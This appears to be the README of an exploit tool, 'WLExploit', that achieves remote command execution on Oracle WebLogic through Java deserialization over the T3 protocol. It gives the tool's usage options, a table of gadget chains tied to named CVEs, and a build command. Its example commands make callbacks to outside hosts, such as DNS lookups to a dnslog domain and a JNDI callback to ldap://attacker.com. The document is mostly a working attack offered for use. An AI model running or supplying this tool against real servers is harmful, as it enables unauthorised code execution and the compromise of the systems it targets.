A proof-of-concept tool for exploit weblogic via T3 protocol based on ysoserial
$ java -jar WLExploit.jar
usage: WLExploit
-c <arg> Execute Command
-g <arg> Gadget
-h <arg> Target Host
-https Https or tls
-os <arg> Os Type [windows,linux]
-p <arg> Target Port
Available gadget types:
Gadget CVE Protocol Command Example Description
------- ------------ ------- --------------------- ----------------------------------
Coherence1 CVE-2020-2883 T3 nslookup sub.dnslog.cn
Coherence2 CVE-2020-2883 T3 nslookup sub.dnslog.cn Other version of CVE-2020-2883
Coherence3 CVE-2020-2884 T3 nslookup sub.dnslog.cn
Coherence4 CVE-2020-14645 T3 ldap://attacker.com:1389/foo JNDI callback
Coherence5 CVE-2020-14644 T3 /path/to/exploit.class Ref: https://www.codetd.com/en/article/11892503
Coherence6 CVE-2021-2302 T3 nslookup sub.dnslog.cn Oracle BI
CommonsCollections1 T3 nslookup sub.dnslog.cn
CommonsCollections2 T3 nslookup sub.dnslog.cn
CommonsCollections3 T3 nslookup sub.dnslog.cn
CommonsCollections4 T3 nslookup sub.dnslog.cn
CommonsCollections5 T3 nslookup sub.dnslog.cn
CommonsCollections6 T3 nslookup sub.dnslog.cn
CommonsCollections7 T3 nslookup sub.dnslog.cn
URLDNS T3 http://sub.dnslog.cn Requires Java 1.8+ and Maven 3.x+
mvn clean package -DskipTests